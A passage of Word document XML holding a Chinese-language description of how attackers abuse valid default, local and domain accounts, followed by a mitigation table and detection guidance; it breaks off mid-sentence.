    <w:p w14:paraId="0E06A063" w14:textId="55AC50DC" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可能</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>会</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidR="006508E9">
        <w:t>凭据访问</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>技术窃取特定用户或服务账号的凭据，或者在侦察过程的早期通过社会工程捕获凭据以获得首次访问权限。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F43B4FB" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可以使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>三种账号</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：默认账号、本地账号和域账号。默认账号是操作系统的内置</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>账号</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，例如</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统上的访客或管理员账号，或者其他类型系统、软件或设备上的默认工厂</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>提供商账号。本地账号是组织配置给用户、远程支持或服务的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>账号，</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或单个系统</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务的管</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>理账号。域账号是</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>AD</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DS</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（活动目录域服务）管理的账号，其</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>访问</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>权限在域内不同系统和服务</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>之间</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>配置。</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>域账号可以涵盖用户、管理员和服务。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5382D1CE" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可以</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>使用窃取的凭据绕过网络内系统上各种资源的访问控制，甚至可用于对远程系统和外部可用服务（如</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>VPN</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>Outlook Web Access</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>和远程桌面）的持久访问。</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者还可能通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>窃取的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>凭据获得</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>特定系统的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>更多</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>权限或</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>网络</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>受限区域</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>访问权限。</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>可以选择不</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>恶意软件或工具与这些凭据提供的合法访问结合使用，</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这样就</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>更难检测到</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>它们</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>的存在。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB7B6C2" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>默认账号并不限于客户端机器上的访客和管理员，</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>它们还包括为设备（如网络设备和计算机应用）预设的账号，无论这些设备是内部的、开源的还是</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>COTS</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。如果设备</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>预设了用户名和密码组合</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>而且</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>安装后不更改</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，将会</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>对组织构成严重威胁，</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>因为它们很容易成为攻击者的目标。同理</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>也</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可能会</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>利用公开披露的私钥或</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>盗取的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>私钥通过远程服务合法地连接到远程环境</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EEB1209" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我们</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>需要关注</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>跨</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>系统网络的账号访问、凭据和权限</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>重叠，因为</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者也许</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>能够</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>跨</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>账号和系统切换以</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获得</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>较高的访问级别（域或企业管理员），从而绕过企业内设置的访问控制。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B1FA9C6" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2547"/>
        <w:gridCol w:w="7189"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="005C4554" w14:paraId="14B4F8D6" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2547" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="38C10E36" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="005C4554" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C4554">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7189" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="614AFC11" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="005C4554" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C4554">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="531A0E8B" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2547" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7DBAE95A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>密码策略</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7189" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="70359821" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>应用</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>及</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>设备</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>的</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>默认用户名和密码应在安装后和部署到生产环境之前立即更改。如果可能，应该定期更新使用</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>SSH</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>密钥的应用，并对其进行适当的保护。</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>确保本地管理员账号在网络上所有系统中有复杂且唯一的密码。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="14968F85" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2547" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="29ACBB58" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>特权账号</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>管理</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7189" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="629BF86E" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>定期审核域</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>账号</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>和本地账号及</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>他们的</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>权限级别</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>查看是否有允许</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>攻击者</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>通过获取特权账号凭据</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>从而</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>获得广泛访问权限的情况。</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="high-light-bg4"/>
              </w:rPr>
              <w:t>这些审核还应包括是否启用了默认账号，或者是否创建了</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="high-light-bg4"/>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>新</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="high-light-bg4"/>
              </w:rPr>
              <w:t>的未经授权的本地账号。不要将用户或管理域账号</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="high-light-bg4"/>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>放在不同</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="high-light-bg4"/>
              </w:rPr>
              <w:t>系统</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="high-light-bg4"/>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>的</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="high-light-bg4"/>
              </w:rPr>
              <w:t>本地管理员组中，除非它们受到严格控制并且是分</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="high-light-bg4"/>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>开使用</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="high-light-bg4"/>
              </w:rPr>
              <w:t>的，因为这通常相当于</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="high-light-bg4"/>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>这些</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="high-light-bg4"/>
              </w:rPr>
              <w:t>系统上都有一个相同密码的本地管理员账号。</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>遵循企业网络设计和管理最佳实践，限制跨管理层使用特权账号。</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>限制跨系统的凭据重叠以防止攻击者获取账号凭据用来访问。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6F0CA8F2" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53BA3EA1" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:t>在整个企业中</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>外部可访问的服务配置可靠、一致的账号活动审核策略。</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="high-light-bg4"/>
          <w:rFonts w:cs="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看是否有</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="high-light-bg4"/>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>跨系统的可疑</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="high-light-bg4"/>
          <w:rFonts w:cs="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="high-light-bg4"/>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>共享账号（用户、管理员或服务账号）</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="high-light-bg4"/>
          <w:rFonts w:cs="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>行为</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="high-light-bg4"/>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>例如</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>：一个账号同时登录到多个系统；多个账号同时登录到同一台</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>机器</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>；在</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>反常</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>时间或工作时间以外登录的账号。</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>账号</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="high-light-bg4"/>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>活动</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="high-light-bg4"/>
          <w:rFonts w:cs="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可能来自</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="high-light-bg4"/>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>交互式登录会话，</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="high-light-bg4"/>
          <w:rFonts w:cs="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>也可能来自在远程系统上执行二进制文件的特定帐户的进程</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="high-light-bg4"/>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>。将其他安全系统与登录信息关联（例如，用户有活动</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="high-light-bg4"/>
          <w:rFonts w:cs="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="high-light-bg4"/>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>登录会话，但尚未进入建筑物或没有访问</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="high-light-bg4"/>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>VPN</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="high-light-bg4"/>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B0183ED" w14:textId="4987EBF8" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="high-light-bg4"/>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>定期</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="high-light-bg4"/>
          <w:rFonts w:cs="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>审核</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="high-light-bg4"/>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>域</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="high-light-bg4"/>
          <w:rFonts w:cs="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>账号</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="high-light-bg4"/>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>和本地系统账号</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="high-light-bg4"/>
          <w:rFonts w:cs="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来查看</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="high-light-bg4"/>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>是否有</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="high-light-bg4"/>
          <w:rFonts w:cs="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者为</w:t>
      </w:r>
      <w:r w:rsidR="008F7150">
        <w:rPr>
          <w:rStyle w:val="high-light-bg4"/>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>持久性</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="high-light-bg4"/>
